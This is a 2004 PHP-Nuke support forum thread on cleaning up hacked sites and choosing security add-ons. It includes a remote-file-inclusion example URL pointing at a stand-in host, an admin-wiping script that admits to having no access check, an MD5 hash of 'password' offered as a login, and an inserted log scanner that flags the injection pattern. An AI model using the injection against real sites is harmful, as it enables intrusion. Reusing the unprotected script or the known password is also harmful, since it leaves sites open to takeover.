Nuke Cops :: View topic - (read first) If your site hacked [ ]
madman
Support Mod
Joined: Feb 15, 2004
Posts: 806
Posted: Fri Jul 30, 2004 2:56 pm

- Please read this topic before you create a new topic about a "hacked site".
- Next, use search for any matching criteria that you are looking for.


A new unauthorized admin account has been created
  1. Run your database tool (e.g. phpMyAdmin).
  2. Open the database that holds the PHP-Nuke tables. In phpMyAdmin, it is listed in the left side panel.
  3. Open the {nuke}_authors table, replacing {nuke} with your actual $prefix name defined in config.php.
  4. Delete all records listed in this table.
  5. Close/log out from your database tool.
  6. Go to your site and run admin.php.
  7. When prompted, enter a new admin account (admin nick, name, password, email, etc).
  8. Done.

If you have no database tool or have no idea how to use it, create the script below, save it as emptyadmins.php, then upload it to your PHP-Nuke root directory.
Code:
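<?php
// Load the PHP-Nuke bootstrap, which provides $prefix (config.php) and $db (database layer).
require_once("mainfile.php");
if (!isset($prefix)) die('config.php not loaded properly.');
if (!isset($db)) die('database layer not loaded properly.');

// Delete every record in the authors (administrators) table.
// This script performs no access check: anyone who requests it empties the table.
$sql = "DELETE FROM " . $prefix . "_authors";
$result = $db->sql_query($sql);
if ($result) {
  echo "All administrator accounts have been removed.<br/>";
  echo "Now run admin.php to create a new admin account.";
} else {
  echo "Unable to access the database.";
}
?>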

Then, run this script from your browser, e.g.:
Code:
http://mysite.com/emptyadmins.php

Remove/delete the script when no longer needed.


My index.php has been tampered with or is showing a hacker message
  1. Log in as admin, and go to the PHP-Nuke administration menu.
  2. Click on the "Messages" icon.
  3. Check every site message by clicking on its "edit" link.
  4. Remove any unnecessary message text, or delete the message.
  5. Done.


A frame is shown at the bottom of my site's page
  1. Log in as admin, and go to the PHP-Nuke administration menu.
  2. Click on the "Preferences" icon.
  3. Remove any unnecessary foot text.
  4. Done.


One or more of your script files have changed
  1. Replace the modified file with the original one on your local machine.
  2. Patch or upgrade any modules that contain an upload feature.


Securing PHP-Nuke
  1. Apply patches for your current PHP-Nuke version. (nukesecurity resources)
  2. Install one or more PHP-Nuke security add-ons: (alphabetical order)

  3. Check for the Hacker Assassins PHP-Nuke combo package, which ships with ChatServ's latest patches and some security add-ons.
  4. Keep watching the Waraxe Forum for PHP-Nuke exploits.
  5. Visit some security sites such as Security Tracker, Security Focus, and Secunia for the latest advisories regarding PHP-Nuke exploits and vulnerabilities.
  6. Keep monitoring for new and upcoming PHP-Nuke exploits and vulnerabilities.


Which is the best security add-on for my site?
KGuske has a comparison table for common PHP-Nuke security add-ons.
Visit this link for more details: http://www.freesoftwarereviews.org/modules.php?name=News&file=article&sid=2


Last update: August 10th, 2004

Find all posts by madmanView user's profileSend private messageVisit poster's websiteYahoo MessengerMSN Messenger
ExtremeGamer
Nuke Soldier
Joined: Jan 27, 2003
Posts: 25
Location: USA
Posted: Tue Aug 24, 2004 3:32 pm

Not only was my site hacked. I cannot change the language as you will see here.

http://www.impa-gscrb.org/html

EG :D
Find all posts by ExtremeGamerView user's profileSend private messageSend e-mailVisit poster's websiteAIM AddressYahoo MessengerMSN MessengerICQ Number
FourRed3s
Private
Joined: Aug 09, 2004
Posts: 39
Posted: Mon Oct 18, 2004 10:06 am

After the dust settled: (this has been edited)

When you delete the records in your authors table, you will have to enter a new record for a new administration person. This has to be done in the database. I used phpmyadmin. You will have to provide an encrypted password. This was given to me by a very nice person: 5f4dcc3b5aa765d61d8327deb882cf99

Copy and paste that into the field for password. It is the word password. This will let you log in and then first thing go to the user admin part of your administration panel and change your password.

Otherwise, you are stuck in a nasty loop! and no way out but the method above or delete the damn thing and start over which is what I was about to do.

Following is my rant, and what started this whole thing.

Someone entered an admin user id in the authors table:

aid = waxx
name = God
url = blank
email = waxx@was.here
pwd = whateverheputhereitisencryptedsoicantreadit

So I did NOT create a new topic about "hacked site". Oh no I did what I was told here: Steps 1 - 8 Done.

And NOW.............................
I would like to login BUT now the security image is GONE!!!!!!!!!!!!!!!!!!!

The only way to get the security image back is to go to phpmyadmin and add the user id directly to the table. For some reason admin.php does NOT enter the information that you enter into the database anymore. Okay so I enter it manually into the database, fine I can do that.

Then guess what happens..........................
The security image is back but the password that is entered into the table for authors using phpmyadmin is NOT encrypted or something like that and even if you go back to your database and put NOTHING in the password field --------- you still can't log in.

WHAT IS GOING ON??????????????? I WAS TRYING TO PROTECT MYSELF FROM HACKERS USING THAT host.deny METHOD ONLY TO FIND OUT WEEKS LATER THAT IT DOESN'T WORK ON APACHE SERVERS. SO I WAS TOLD TO USE .htaccess METHOD.

I GUESS THAT DOESN'T WORK EITHER!!!!!!!!!!!!!

This is just a little town's chamber of commerce site. We have no money so all work on this since August of this year has been for nothing. And now our site is ruined.

What did we do to anybody to deserve this???????????????
Find all posts by FourRed3sView user's profileSend private message
Evaders99
Site Admin
Joined: Aug 17, 2003
Posts: 12482
Posted: Mon Oct 18, 2004 7:14 pm

Hackers do what hackers do... sorry your site seems to have been destroyed by them. Keep backups and keep your site up-to-date with the latest patches and security addons. Nothing is 100% secure, so always have backups.

.htaccess does work on Apache servers, but only if you use the correct instructions and use a security addon that will write banned IPs to it.

So he used another admin hack.. I believe this is addressed here: http://www.nukecops.com/postt35530.html

If you've done everything possible to secure your site, there's nothing more you can do except keep working to get your site back and active.

Best of luck

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
FourRed3s
Private
Joined: Aug 09, 2004
Posts: 39
Posted: Tue Oct 19, 2004 6:28 am

You are right and thanks for the empathy. I downloaded the 7.5 version of phpnuke about two weeks ago. I paid $10. I was going to use it on another civic organization but I think I will remove this site that is compromised and maybe try to salvage my calendar info and new stories info and --- start from scratch.

I downloaded something called Admin Secure that is mentioned on this site. However, the instructions for installing it are. . . . I don't have a word, but I read it and feel like I am missing "chunks" of information that the writers of the script expect me to already know. And I find it intimidating. Besides that, if I put this "security" add-on on a program that is already broken, I know that would be wasting my time.

Anyway, thanks for listening to me and understanding. I have never had this happen before. I have been very fortunate. I am learning something new every day here. --- Thanks to all --- :)
Find all posts by FourRed3sView user's profileSend private message
chiumanfu
Nuke Soldier
Joined: Jun 08, 2003
Posts: 18
Posted: Tue Oct 19, 2004 8:41 am

Get PHPnuke 7.4-patched and Sentinel 2.1.0 from here
http://nukeresources.com/downloads-cat97.html

I suggest using 7.4 because 7.5 requires some work to get your old modules to work properly. If you're not comfortable installing adminsecure, I don't think you'll be able to upgrade your modules for 7.5.

Here is the Sentinel installation and user guide
http://www.nukescripts.net/modules.php?name=User_Guide
Find all posts by chiumanfuView user's profileSend private message
stanny
Nuke Soldier
Joined: Oct 08, 2004
Posts: 18
Posted: Tue Oct 26, 2004 6:15 am

According to the post, I downloaded admin secure. Now my users can't view my custom modules that have hotlinked files in them. It says detecting cross server scripting or something like that. Is there any way to uninstall admin secure? Please help someone.
Find all posts by stannyView user's profileSend private message
madman
Support Mod
Joined: Feb 15, 2004
Posts: 806
Posted: Tue Oct 26, 2004 8:03 am

stanny wrote:
According to the post, I downloaded admin secure. Now my users can't view my custom modules that have hotlinked files in them. It says detecting cross server scripting or something like that. Is there any way to uninstall admin secure? Please help someone.

Put this line at the beginning of your mainfile.php to deactivate Admin Secure (without uninstalling it):
Code:
define('ASEC_SHUTDOWN', 1);


ps:
May I know which module is causing the problem?

Find all posts by madmanView user's profileSend private messageVisit poster's websiteYahoo MessengerMSN Messenger
stanny
Nuke Soldier
Joined: Oct 08, 2004
Posts: 18
Posted: Wed Oct 27, 2004 9:38 pm

I think the problem is because I linked modules through another folder in the module directory. It was like "modules.php?name=post/id1". So I linked them without activating any module. It worked fine before I installed admin secure.

Another problem I faced is that when I changed passwords for the super user, it won't let me log in anymore. Any idea how to fix this? It says account temporary suspended.

Admin secure is great, but it's really giving me a hard time lol.
Find all posts by stannyView user's profileSend private message
Evaders99
Site Admin
Joined: Aug 17, 2003
Posts: 12482
Posted: Wed Oct 27, 2004 10:38 pm

You will need to go into Admin Secure (using the authorization codes if needed) and approve your admin changes there.

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
madman
Support Mod
Joined: Feb 15, 2004
Posts: 806
Posted: Thu Oct 28, 2004 11:14 am

stanny wrote:
I think the problem is because I linked modules through another folder in the module directory. It was like "modules.php?name=post/id1". So I linked them without activating any module. It worked fine before I installed admin secure.

You can deactivate the "Filter External Linking" option in the Admin Secure configuration. But be aware that an attacker can inject your site by executing an external script from an outside domain. For example:
Code:
modules.php?name=http://somesite/injectfile.php


stanny wrote:
Another problem I faced is that when I changed passwords for the super user, it won't let me log in anymore. Any idea how to fix this? It says account temporary suspended.

You need to approve admin accounts every time they're created or modified. This can be done from the Admin Secure "Account Approval" page.

stanny wrote:
Admin secure is great, but it's really giving me a hard time lol.

Well, I knew that. :)
It is advisable to set the "Filter Proofing" option in the configuration page to either "God Admin" or "All Administrator" and put your IP address into the "Exclude System" IP list.

Find all posts by madmanView user's profileSend private messageVisit poster's websiteYahoo MessengerMSN Messenger
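
The request pattern described in the post above, turned into an access-log check. This is an added example, not part of the original thread or of Admin Secure; it assumes Apache combined-format logs and that legitimate module names contain only letters, digits, underscores and hyphens, and the log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption for this sketch: a plain module name is letters, digits, "_" or "-".
PLAIN_NAME = re.compile(r"^[A-Za-z0-9_-]+$")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify_name(value):
    """Classify one decoded `name` value from a modules.php request."""
    if PLAIN_NAME.match(value):
        return "ok"
    if re.match(r"^[a-z][a-z0-9+.-]*:", value, re.I) or value.startswith("//"):
        return "external-url"
    if "/" in value or "\\" in value or ".." in value:
        return "path"
    return "other"

def scan(lines):
    """Return (line_number, client, verdict, value) for each suspicious request."""
    findings = []
    for num, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("modules.php"):
            continue
        # parse_qs percent-decodes values, so encoded forms are classified the same way.
        for value in parse_qs(url.query, keep_blank_values=True).get("name", []):
            verdict = classify_name(value)
            if verdict != "ok":
                findings.append((num, line.split()[0], verdict, value))
    return findings

# Constructed access-log lines; client addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [28/Oct/2004:11:00:01 +0000] "GET /modules.php?name=News&file=article&sid=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [28/Oct/2004:11:00:09 +0000] "GET /modules.php?name=http://somesite/injectfile.php HTTP/1.1" 200 312',
    '198.51.100.7 - - [28/Oct/2004:11:00:12 +0000] "GET /modules.php?name=http%3A%2F%2Fsomesite%2Finjectfile.php HTTP/1.1" 200 312',
    '192.0.2.33 - - [28/Oct/2004:11:02:40 +0000] "GET /modules.php?name=post/id1 HTTP/1.1" 200 2048',
    '192.0.2.10 - - [28/Oct/2004:11:03:00 +0000] "GET /index.php HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The post/id1 style link from the thread is reported as `path`, since it is not a plain module name.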
stanny
Nuke Soldier
Joined: Oct 08, 2004
Posts: 18
Posted: Wed Nov 10, 2004 8:14 pm

Heya guys, it's me again. I am a bit afraid this time lol. Although I have admin secure running, people still say there are tons of ways to exploit my site and stuff. Would you recommend another security system in addition to admin secure? Say Sentinel? The others?
Find all posts by stannyView user's profileSend private message
HalJordan
Support Staff
Joined: Aug 07, 2004
Posts: 1117
Location: Somewhere around Hunan, China
Posted: Wed Nov 10, 2004 8:17 pm

Sentinel is really good, now in version 2.1.1. I use it and AS1.7. Protector is also very useful.

_________________
I obey, but I do not comply.

Proprietor, www.computernewbie.info
Support staff, www.nukecops.com
Find all posts by HalJordanView user's profileSend private messageSend e-mailVisit poster's websiteAIM Address
stanny
Nuke Soldier
Joined: Oct 08, 2004
Posts: 18
Posted: Wed Nov 10, 2004 8:26 pm

Awesome, I read protector's page and they say it blocks all sorts of attacks like cookie, injections and stuff. But the thing is, is it recommended to install so many security systems besides just sticking to one? Won't it slow the site down?

On a side note: When I uploaded the phpnuke program to my webspace, .htaccess was not uploadable because it started with "." so I renamed it to htaccess instead. I didn't do anything wrong, did I (regarding security)?

Thanks.
Find all posts by stannyView user's profileSend private message
Evaders99
Site Admin
Joined: Aug 17, 2003
Posts: 12482
Posted: Wed Nov 10, 2004 10:50 pm

Yes, multiple addons will slow your system down. But if you have a good host, it really should be able to keep up with all your scripts :)

On your server, you can rename the file back to .htaccess

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address